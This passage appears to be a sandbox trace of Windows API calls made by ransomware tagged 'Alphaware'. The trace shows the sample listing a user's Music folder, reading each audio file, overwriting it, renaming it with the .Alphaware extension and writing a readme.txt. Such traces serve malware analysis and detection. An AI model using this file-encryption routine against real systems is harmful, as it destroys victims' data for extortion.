[0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80339c70, ftCreationTime.dwHighDateTime=0x1d97580, ftLastAccessTime.dwLowDateTime=0xd2ecf80, ftLastAccessTime.dwHighDateTime=0x1d975f1, ftLastWriteTime.dwLowDateTime=0x8675f0c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x12cb4, dwReserved0=0x0, dwReserved1=0x0, cFileName="R1vLsowFVmI7.wav.Alphaware", cAlternateFileName="R1VLSO~1.ALP")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x86549d80, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x86549d80, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x86549d80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5667df20, ftCreationTime.dwHighDateTime=0x1d97641, ftLastAccessTime.dwLowDateTime=0xff280730, ftLastAccessTime.dwHighDateTime=0x1d97668, ftLastWriteTime.dwLowDateTime=0x867ab380, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x192f4, dwReserved0=0x0, dwReserved1=0x0, cFileName="sRZM.m4a.Alphaware", cAlternateFileName="SRZMM4~1.ALP")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f9c3170, ftCreationTime.dwHighDateTime=0x1d96965, ftLastAccessTime.dwLowDateTime=0xdb919bb0, ftLastAccessTime.dwHighDateTime=0x1d97285, ftLastWriteTime.dwLowDateTime=0x8681d7a0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdec8, dwReserved0=0x0, dwReserved1=0x0, cFileName="vGw-gK7bU.mp3.Alphaware", cAlternateFileName="VGW-GK~1.ALP")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9204120, ftCreationTime.dwHighDateTime=0x1d96e2c, ftLastAccessTime.dwLowDateTime=0xf46579d0, ftLastAccessTime.dwHighDateTime=0x1d97371, ftLastWriteTime.dwLowDateTime=0x86901fe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19074, dwReserved0=0x0, dwReserved1=0x0, cFileName="VrH278.wav.Alphaware", cAlternateFileName="VRH278~1.ALP")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9179a90, ftCreationTime.dwHighDateTime=0x1d97597, ftLastAccessTime.dwLowDateTime=0x4c086d00, ftLastAccessTime.dwHighDateTime=0x1d97642, ftLastWriteTime.dwLowDateTime=0x869e6820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19ef4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZrE7dehuPYX5_4a02P.wav.Alphaware", cAlternateFileName="ZRE7DE~1.ALP")) returned 1 [0087.956] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9179a90, ftCreationTime.dwHighDateTime=0x1d97597, ftLastAccessTime.dwLowDateTime=0x4c086d00, ftLastAccessTime.dwHighDateTime=0x1d97642, ftLastWriteTime.dwLowDateTime=0x869e6820, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19ef4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZrE7dehuPYX5_4a02P.wav.Alphaware", cAlternateFileName="ZRE7DE~1.ALP")) returned 0 [0087.957] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0087.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0087.957] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0087.957] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0087.957] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq", lpFilePart=0x0) returned 0x29 [0087.957] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\*" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6580dbb0, ftCreationTime.dwHighDateTime=0x1d967dc, ftLastAccessTime.dwLowDateTime=0x7c4560d0, ftLastAccessTime.dwHighDateTime=0x1d97026, ftLastWriteTime.dwLowDateTime=0x7c4560d0, ftLastWriteTime.dwHighDateTime=0x1d97026, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a1f0 [0087.957] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6580dbb0, ftCreationTime.dwHighDateTime=0x1d967dc, ftLastAccessTime.dwLowDateTime=0x7c4560d0, ftLastAccessTime.dwHighDateTime=0x1d97026, ftLastWriteTime.dwLowDateTime=0x7c4560d0, ftLastWriteTime.dwHighDateTime=0x1d97026, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3b44430, ftCreationTime.dwHighDateTime=0x1d96f9f, ftLastAccessTime.dwLowDateTime=0x2efa3ad0, ftLastAccessTime.dwHighDateTime=0x1d97017, ftLastWriteTime.dwLowDateTime=0x2efa3ad0, ftLastWriteTime.dwHighDateTime=0x1d97017, nFileSizeHigh=0x0, nFileSizeLow=0x131e5, dwReserved0=0x0, dwReserved1=0x0, cFileName="1tTeAH3Idl9j.m4a", cAlternateFileName="1TTEAH~1.M4A")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c2b50, ftCreationTime.dwHighDateTime=0x1d96e1e, ftLastAccessTime.dwLowDateTime=0x52b6eea0, ftLastAccessTime.dwHighDateTime=0x1d9716b, ftLastWriteTime.dwLowDateTime=0x52b6eea0, ftLastWriteTime.dwHighDateTime=0x1d9716b, nFileSizeHigh=0x0, nFileSizeLow=0x11485, dwReserved0=0x0, dwReserved1=0x0, cFileName="6Osm8H3fx Y3KmcYQKDK.m4a", cAlternateFileName="6OSM8H~1.M4A")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f35a0a0, ftCreationTime.dwHighDateTime=0x1d96c48, ftLastAccessTime.dwLowDateTime=0xd857ebe0, ftLastAccessTime.dwHighDateTime=0x1d970c1, ftLastWriteTime.dwLowDateTime=0xd857ebe0, ftLastWriteTime.dwHighDateTime=0x1d970c1, nFileSizeHigh=0x0, nFileSizeLow=0x15a19, dwReserved0=0x0, dwReserved1=0x0, cFileName="EbGhT40n22E7YA.mp3", cAlternateFileName="EBGHT4~1.MP3")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bd4ef0, ftCreationTime.dwHighDateTime=0x1d96e90, ftLastAccessTime.dwLowDateTime=0x4df044f0, ftLastAccessTime.dwHighDateTime=0x1d97212, ftLastWriteTime.dwLowDateTime=0x4df044f0, ftLastWriteTime.dwHighDateTime=0x1d97212, nFileSizeHigh=0x0, nFileSizeLow=0xfa91, dwReserved0=0x0, dwReserved1=0x0, cFileName="eRiABnWG9I.m4a", cAlternateFileName="ERIABN~1.M4A")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64c24e10, ftCreationTime.dwHighDateTime=0x1d96bf7, ftLastAccessTime.dwLowDateTime=0xf4824a80, ftLastAccessTime.dwHighDateTime=0x1d97059, ftLastWriteTime.dwLowDateTime=0xf4824a80, ftLastWriteTime.dwHighDateTime=0x1d97059, nFileSizeHigh=0x0, nFileSizeLow=0x16725, dwReserved0=0x0, dwReserved1=0x0, cFileName="Jl GdXo.wav", cAlternateFileName="JLGDXO~1.WAV")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53886c00, ftCreationTime.dwHighDateTime=0x1d96d24, ftLastAccessTime.dwLowDateTime=0x2a8082c0, ftLastAccessTime.dwHighDateTime=0x1d96ec8, ftLastWriteTime.dwLowDateTime=0x2a8082c0, ftLastWriteTime.dwHighDateTime=0x1d96ec8, nFileSizeHigh=0x0, nFileSizeLow=0x917, dwReserved0=0x0, dwReserved1=0x0, cFileName="kAkqA9OTk.m4a", cAlternateFileName="KAKQA9~1.M4A")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19b10df0, ftCreationTime.dwHighDateTime=0x1d972f8, ftLastAccessTime.dwLowDateTime=0x485a2640, ftLastAccessTime.dwHighDateTime=0x1d9747a, ftLastWriteTime.dwLowDateTime=0x485a2640, ftLastWriteTime.dwHighDateTime=0x1d9747a, nFileSizeHigh=0x0, nFileSizeLow=0xb149, dwReserved0=0x0, dwReserved1=0x0, cFileName="LIjGz_b-guf6pPz.wav", cAlternateFileName="LIJGZ_~1.WAV")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd19a0d0, ftCreationTime.dwHighDateTime=0x1d96e29, ftLastAccessTime.dwLowDateTime=0x8f96b840, ftLastAccessTime.dwHighDateTime=0x1d9753b, ftLastWriteTime.dwLowDateTime=0x8f96b840, ftLastWriteTime.dwHighDateTime=0x1d9753b, nFileSizeHigh=0x0, nFileSizeLow=0x18735, dwReserved0=0x0, dwReserved1=0x0, cFileName="pOajqkURwLncz.wav", cAlternateFileName="POAJQK~1.WAV")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c543090, ftCreationTime.dwHighDateTime=0x1d96756, ftLastAccessTime.dwLowDateTime=0xf85dd470, ftLastAccessTime.dwHighDateTime=0x1d97000, ftLastWriteTime.dwLowDateTime=0xf85dd470, ftLastWriteTime.dwHighDateTime=0x1d97000, nFileSizeHigh=0x0, nFileSizeLow=0xe3bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="srAa yNa6Fae6hy.m4a", cAlternateFileName="SRAAYN~1.M4A")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf88f680, ftCreationTime.dwHighDateTime=0x1d96b6c, ftLastAccessTime.dwLowDateTime=0x96f2a030, ftLastAccessTime.dwHighDateTime=0x1d96e5c, ftLastWriteTime.dwLowDateTime=0x96f2a030, ftLastWriteTime.dwHighDateTime=0x1d96e5c, nFileSizeHigh=0x0, nFileSizeLow=0x7110, dwReserved0=0x0, dwReserved1=0x0, cFileName="t-km3HlYo8hOM.wav", cAlternateFileName="T-KM3H~1.WAV")) returned 1 [0087.958] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0087.959] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0087.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0087.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0087.959] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\1tTeAH3Idl9j.m4a", dwFileAttributes=0x80) returned 1 [0087.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.959] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\1tTeAH3Idl9j.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\1tteah3idl9j.m4a"), fInfoLevelId=0x0, lpFileInformation=0x24bc018 | out: lpFileInformation=0x24bc018*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd3b44430, ftCreationTime.dwHighDateTime=0x1d96f9f, ftLastAccessTime.dwLowDateTime=0x2efa3ad0, ftLastAccessTime.dwHighDateTime=0x1d97017, ftLastWriteTime.dwLowDateTime=0x2efa3ad0, ftLastWriteTime.dwHighDateTime=0x1d97017, nFileSizeHigh=0x0, nFileSizeLow=0x131e5)) returned 1 [0087.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.960] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\1tTeAH3Idl9j.m4a", nBufferLength=0x105, lpBuffer=0x23e4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\1tTeAH3Idl9j.m4a", lpFilePart=0x0) returned 0x3a [0087.960] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.960] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\1tTeAH3Idl9j.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\1tteah3idl9j.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.960] GetFileType (hFile=0x254) returned 0x1 [0087.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.960] GetFileType (hFile=0x254) returned 0x1 [0087.960] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x131e5 [0087.960] ReadFile (in: hFile=0x254, lpBuffer=0x24bc2a0, nNumberOfBytesToRead=0x131e5, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24bc2a0*, lpNumberOfBytesRead=0x23ea98*=0x131e5, lpOverlapped=0x0) returned 1 [0087.962] CloseHandle (hObject=0x254) returned 1 [0087.988] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0087.988] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\1tTeAH3Idl9j.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\1tteah3idl9j.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.991] GetFileType (hFile=0x254) returned 0x1 [0087.991] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0087.991] GetFileType (hFile=0x254) returned 0x1 [0087.995] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0087.995] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\1tTeAH3Idl9j.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\1tteah3idl9j.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3b44430, ftCreationTime.dwHighDateTime=0x1d96f9f, ftLastAccessTime.dwLowDateTime=0x2efa3ad0, ftLastAccessTime.dwHighDateTime=0x1d97017, ftLastWriteTime.dwLowDateTime=0x86a58c40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x198b4)) returned 1 [0087.995] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0087.995] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\1tTeAH3Idl9j.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\1tteah3idl9j.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\1tTeAH3Idl9j.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\1tteah3idl9j.m4a.alphaware")) returned 1 [0087.996] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0087.996] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0087.996] GetFileType (hFile=0x254) returned 0x1 [0087.996] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0087.997] GetFileType (hFile=0x254) returned 0x1 [0087.998] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\6Osm8H3fx Y3KmcYQKDK.m4a", dwFileAttributes=0x80) returned 1 [0087.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0087.998] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\6Osm8H3fx Y3KmcYQKDK.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\6osm8h3fx y3kmcyqkdk.m4a"), fInfoLevelId=0x0, lpFileInformation=0x2589f30 | out: lpFileInformation=0x2589f30*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xb1c2b50, ftCreationTime.dwHighDateTime=0x1d96e1e, ftLastAccessTime.dwLowDateTime=0x52b6eea0, ftLastAccessTime.dwHighDateTime=0x1d9716b, ftLastWriteTime.dwLowDateTime=0x52b6eea0, ftLastWriteTime.dwHighDateTime=0x1d9716b, nFileSizeHigh=0x0, nFileSizeLow=0x11485)) returned 1 [0087.998] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0087.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0087.999] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\6Osm8H3fx Y3KmcYQKDK.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\6osm8h3fx y3kmcyqkdk.m4a"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0087.999] GetFileType (hFile=0x254) returned 0x1 [0087.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0087.999] GetFileType (hFile=0x254) returned 0x1 [0087.999] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x11485 [0087.999] ReadFile (in: hFile=0x254, lpBuffer=0x258a1f8, nNumberOfBytesToRead=0x11485, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x258a1f8*, lpNumberOfBytesRead=0x23ea98*=0x11485, lpOverlapped=0x0) returned 1 [0088.000] CloseHandle (hObject=0x254) returned 1 [0088.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.026] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\6Osm8H3fx Y3KmcYQKDK.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\6osm8h3fx y3kmcyqkdk.m4a"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.028] GetFileType (hFile=0x254) returned 0x1 [0088.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.028] GetFileType (hFile=0x254) returned 0x1 [0088.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.032] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\6Osm8H3fx Y3KmcYQKDK.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\6osm8h3fx y3kmcyqkdk.m4a"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c2b50, ftCreationTime.dwHighDateTime=0x1d96e1e, ftLastAccessTime.dwLowDateTime=0x52b6eea0, ftLastAccessTime.dwHighDateTime=0x1d9716b, ftLastWriteTime.dwLowDateTime=0x86aa4f00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x17188)) returned 1 [0088.032] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.032] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\6Osm8H3fx Y3KmcYQKDK.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\6osm8h3fx y3kmcyqkdk.m4a"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\6Osm8H3fx Y3KmcYQKDK.m4a.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\6osm8h3fx y3kmcyqkdk.m4a.alphaware")) returned 1 [0088.033] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\EbGhT40n22E7YA.mp3", dwFileAttributes=0x80) returned 1 [0088.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0088.033] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\EbGhT40n22E7YA.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\ebght40n22e7ya.mp3"), fInfoLevelId=0x0, lpFileInformation=0x245ef48 | out: lpFileInformation=0x245ef48*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4f35a0a0, ftCreationTime.dwHighDateTime=0x1d96c48, ftLastAccessTime.dwLowDateTime=0xd857ebe0, ftLastAccessTime.dwHighDateTime=0x1d970c1, ftLastWriteTime.dwLowDateTime=0xd857ebe0, ftLastWriteTime.dwHighDateTime=0x1d970c1, nFileSizeHigh=0x0, nFileSizeLow=0x15a19)) returned 1 [0088.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0088.034] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0088.034] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\EbGhT40n22E7YA.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\ebght40n22e7ya.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0088.034] GetFileType (hFile=0x254) returned 0x1 [0088.034] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0088.034] GetFileType (hFile=0x254) returned 0x1 [0088.035] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x15a19 [0088.035] ReadFile (in: hFile=0x254, lpBuffer=0x129a2110, nNumberOfBytesToRead=0x15a19, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x129a2110*, lpNumberOfBytesRead=0x23ea98*=0x15a19, lpOverlapped=0x0) returned 1 [0088.036] CloseHandle (hObject=0x254) returned 1 [0088.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0088.068] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\EbGhT40n22E7YA.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\ebght40n22e7ya.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0088.070] GetFileType (hFile=0x254) returned 0x1 [0088.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0088.070] GetFileType (hFile=0x254) returned 0x1 [0088.073] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0088.073] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\EbGhT40n22E7YA.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\ebght40n22e7ya.mp3"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f35a0a0, ftCreationTime.dwHighDateTime=0x1d96c48, ftLastAccessTime.dwLowDateTime=0xd857ebe0, ftLastAccessTime.dwHighDateTime=0x1d970c1, ftLastWriteTime.dwLowDateTime=0x86b17320, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1ce48)) returned 1 [0088.073] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0088.073] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\EbGhT40n22E7YA.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\ebght40n22e7ya.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\EbGhT40n22E7YA.mp3.Alphaware" (normalized: "c:\\users\\keecfmwgj\\music\\rbnxfldoe6j5fmdq\\ebght40n22e7ya.mp3.alphaware")) returned 1 [0088.074] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\RBnxFLdoe6j5FMDq\\eRiABnWG9I.m4a", dwFileAttributes=0x80) returned 1 [0088.074] SetThreadErrorMode (dwNewMode=0x1, 